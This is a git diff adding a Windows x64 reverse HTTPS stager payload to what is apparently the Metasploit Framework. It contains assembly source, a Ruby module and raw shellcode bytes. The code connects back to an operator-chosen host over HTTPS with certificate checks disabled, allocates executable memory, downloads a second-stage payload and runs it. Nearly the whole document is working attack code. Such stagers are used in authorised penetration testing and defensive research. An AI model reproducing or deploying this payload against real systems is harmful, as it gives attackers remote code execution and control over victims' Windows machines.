diff --git a/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin b/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin new file mode 100644 index 0000000000..c19921552c Binary files /dev/null and b/external/source/shellcode/windows/x64/bin/stager_reverse_https.bin differ diff --git a/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm new file mode 100644 index 0000000000..673cac7ccd --- /dev/null +++ b/external/source/shellcode/windows/x64/src/block/block_reverse_https.asm @@ -0,0 +1,157 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2003 +; Architecture: x64 +;-----------------------------------------------------------------------------; +[BITS 64] + +; Input: RBP must be the address of 'api_call'. +; Output: RDI will be the socket for the connection to the server +; Clobbers: RAX, RCX, RDX, RDI, R8, R9, R10, R12, R13, R14, R15 + +load_wininet: + ; setup the structures we need on the stack... + mov r14, 'wininet' + push r14 ; Push the bytes 'wininet',0 onto the stack. + mov r14, rsp ; save pointer to the "wininet" string for LoadLibraryA call. + mov rcx, r14 ; set the param for the library to load + mov r10, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call rbp ; LoadLibraryA( "ws2_32" ) + +internetopen: + push byte 0 ; NULL pointer + mov rcx, rsp ; LPCTSTR lpszAgent ("\x00") + xor rdx, rdx ; DWORD dwAccessType (PRECONFIG = 0) + xor r8, r8 ; LPCTSTR lpszProxyName + xor r9, r9 ; LPCTSTR lpszProxyBypass + push r8 ; DWORD dwFlags + push r8 ; alignment + mov r10, 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call rbp + + jmp dbl_get_server_host + +internetconnect: + pop rdx ; LPCTSTR lpszServerName + mov rcx, rax ; HINTERNET hInternet + mov r8, 4444 ; PORT + xor r9, r9 ; LPCTSTR lpszUsername + push r9 ; DWORD_PTR dwContext (NULL) + push r9 ; DWORD dwFlags + push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push r9 ; alignment + mov r10, 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call rbp + + jmp get_server_uri + +httpopenrequest: + mov rcx, rax ; HINTERNET hConnect + xor rdx, rdx ; LPCTSTR lpszVerb + pop r8 ; LPCTSTR lpszObjectName + xor r9, r9 ; LPCTSTR lpszVersion + push rdx ; DWORD_PTR dwContext + push qword (0x0000000080000000 | 0x0000000004000000 | 0x0000000000800000 | 0x0000000000200000 | 0x0000000000001000 |0x0000000000002000 |0x0000000000000200) ; dwFlags + ;0x80000000 | ; INTERNET_FLAG_RELOAD + ;0x04000000 | ; INTERNET_NO_CACHE_WRITE + ;0x00800000 | ; INTERNET_FLAG_SECURE + ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + ;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID + ;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID + ;0x00000200 ; INTERNET_FLAG_NO_UI + push rdx ; LPCTSTR *lplpszAcceptTypes + push rdx ; LPCTSTR lpszReferer + mov r10, 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call rbp + mov rsi, rax + +retry: + push byte 10 + pop rdi + +; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); +internetsetoption: + mov rcx, rsi ; HINTERNET hInternet + mov rdx, 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) + push qword 0x00003380 + ;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID + ;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID + ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE + ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA + ;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION + mov r8, rsp + mov r9, 4 ; sizeof(dwFlags) + mov r10, 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + call rbp + +httpsendrequest: + mov rcx, rsi ; HINTERNET hRequest + xor rdx, rdx ; LPCTSTR lpszHeaders + xor r8, r8 ; DWORD dwHeadersLength + xor r9, r9 ; LPVOID lpOptional + push rdx ; DWORD dwOptionalLength + mov r10, 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call rbp + test eax,eax + jnz short allocate_memory + +try_it_again: + dec rdi + jz failure + jmp short internetsetoption + +dbl_get_server_host: + jmp get_server_host + +get_server_uri: + call httpopenrequest + +server_uri: + db "/12345", 0x00 + +failure: + mov r14, 0x56A2B5F0 ; hardcoded to exitprocess for size + call rbp + +allocate_memory: + xor rcx, rcx ; LPVOID lpAddress + mov rdx, 0x00400000 ; SIZE_T dwSize + mov r8, 0x1000 ; DWORD flAllocationType(MEM_COMMIT) + mov r9, 0x40 ; DWORD flProtect(PAGE_EXECUTE_READWRITE) + mov r10, 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call rbp + +download_prep: + xchg rax, rbx ; place the allocated base address in ebx + push rbx ; store a copy of the stage base address on the stack + push rbx ; temporary storage for bytes read count + mov rdi, rsp ; &bytesRead + +download_more: + mov rcx, rsi ; HINTERNET hFile + mov rdx, rbx ; LPVOID lpBuffer + mov r8, 8192 ; DWORD dwNumberOfBytesToRead + mov r9, rdi ; LPDWORD lpdwNumberOfBytesRead + mov r10, 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call rbp + add rsp, 32 ; clean reserverd space + + test eax,eax ; download failed? (optional?) + jz failure + + mov rax, [rdi] + add rbx, rax ; buffer += bytes_received + + test rax,rax ; optional? + jnz download_more ; continue until it returns 0 + pop rax ; clear the temporary storage + pop rax ; f*cking alignment + +execute_stage: + ret ; dive into the stored stage address + +get_server_host: + call internetconnect + +server_host: + diff --git a/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm new file mode 100644 index 0000000000..090bde4640 --- /dev/null +++ b/external/source/shellcode/windows/x64/src/stager/stager_reverse_https.asm @@ -0,0 +1,19 @@ +;-----------------------------------------------------------------------------; +; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com) +; Compatible: Windows 7, 2003 +; Architecture: x64 +; Size: 422 bytes +; Build: >build.py stager_reverse_https +;-----------------------------------------------------------------------------; + +[BITS 64] +[ORG 0] + + cld ; Clear the direction flag. + and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned + call start ; Call start, this pushes the address of 'api_call' onto the stack. +%include "./src/block/block_api.asm" +start: ; + pop rbp ; pop off the address of 'api_call' for calling later. +%include "./src/block/block_reverse_https.asm" + ; By here we will have performed the reverse_tcp connection and EDI will be our socket \ No newline at end of file diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb new file mode 100644 index 0000000000..5a94bfd9ae --- /dev/null +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -0,0 +1,101 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' +require 'msf/core/handler/reverse_https' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Windows + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Windows x64 Reverse HTTPS Stager', + 'Description' => 'Tunnel communication over HTTP using SSL (Windows x64)', + 'Author' => 'hdm (x64 rewrite by agix)', + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86_64, + 'Handler' => Msf::Handler::ReverseHttps, + 'Convention' => 'sockrdi https', + 'Stager' => + { + 'Offsets' => + { + # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) + # 'EXITFUNC' => [ 290, 'V' ], + 'LPORT' => [ 282, 'v' ], # Not a typo, really little endian + }, + 'Payload' => + "\xFC\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51" + + "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" + + "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" + + "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78" + + "\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67" + + "\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56" + + "\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0" + + "\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24" + + "\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41" + + "\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01" + + "\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83" + + "\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF" + + "\xFF\xFF\x5D\x49\xBE\x77\x69\x6E\x69\x6E\x65\x74\x00\x41\x56\x49" + + "\x89\xE6\x4C\x89\xF1\x49\xBA\x4C\x77\x26\x07\x00\x00\x00\x00\xFF" + + "\xD5\x6A\x00\x48\x89\xE1\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41" + + "\x50\x41\x50\x49\xBA\x3A\x56\x79\xA7\x00\x00\x00\x00\xFF\xD5\xE9" + + "\x9B\x00\x00\x00\x5A\x48\x89\xC1\x49\xB8\x5C\x11\x00\x00\x00\x00" + + "\x00\x00\x4D\x31\xC9\x41\x51\x41\x51\x6A\x03\x41\x51\x49\xBA\x57" + + "\x89\x9F\xC6\x00\x00\x00\x00\xFF\xD5\xEB\x79\x48\x89\xC1\x48\x31" + + "\xD2\x41\x58\x4D\x31\xC9\x52\x68\x00\x32\xA0\x84\x52\x52\x49\xBA" + + "\xEB\x55\x2E\x3B\x00\x00\x00\x00\xFF\xD5\x48\x89\xC6\x6A\x0A\x5F" + + "\x48\x89\xF1\x48\xBA\x1F\x00\x00\x00\x00\x00\x00\x00\x68\x80\x33" + + "\x00\x00\x49\x89\xE0\x49\xB9\x04\x00\x00\x00\x00\x00\x00\x00\x49" + + "\xBA\x75\x46\x9E\x86\x00\x00\x00\x00\xFF\xD5\x48\x89\xF1\x48\x31" + + "\xD2\x4D\x31\xC0\x4D\x31\xC9\x52\x49\xBA\x2D\x06\x18\x7B\x00\x00" + + "\x00\x00\xFF\xD5\x85\xC0\x75\x24\x48\xFF\xCF\x74\x13\xEB\xB1\xE9" + + "\x81\x00\x00\x00\xE8\x82\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00" + + "\x49\xBE\xF0\xB5\xA2\x56\x00\x00\x00\x00\xFF\xD5\x48\x31\xC9\x48" + + "\xBA\x00\x00\x40\x00\x00\x00\x00\x00\x49\xB8\x00\x10\x00\x00\x00" + + "\x00\x00\x00\x49\xB9\x40\x00\x00\x00\x00\x00\x00\x00\x49\xBA\x58" + + "\xA4\x53\xE5\x00\x00\x00\x00\xFF\xD5\x48\x93\x53\x53\x48\x89\xE7" + + "\x48\x89\xF1\x48\x89\xDA\x49\xB8\x00\x20\x00\x00\x00\x00\x00\x00" + + "\x49\x89\xF9\x49\xBA\x12\x96\x89\xE2\x00\x00\x00\x00\xFF\xD5\x48" + + "\x83\xC4\x20\x85\xC0\x74\x99\x48\x8B\x07\x48\x01\xC3\x48\x85\xC0" + + "\x75\xCE\x58\x58\xC3\xE8\xDA\xFE\xFF\xFF" + } + )) + end + + # + # Do not transmit the stage over the connection. We handle this via HTTPS + # + def stage_over_connection? + false + end + + # + # Generate the first stage + # + def generate + p = super + i = p.index("/12345\x00") + u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00" + p[i, u.length] = u + p + datastore['LHOST'].to_s + "\x00" + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end +end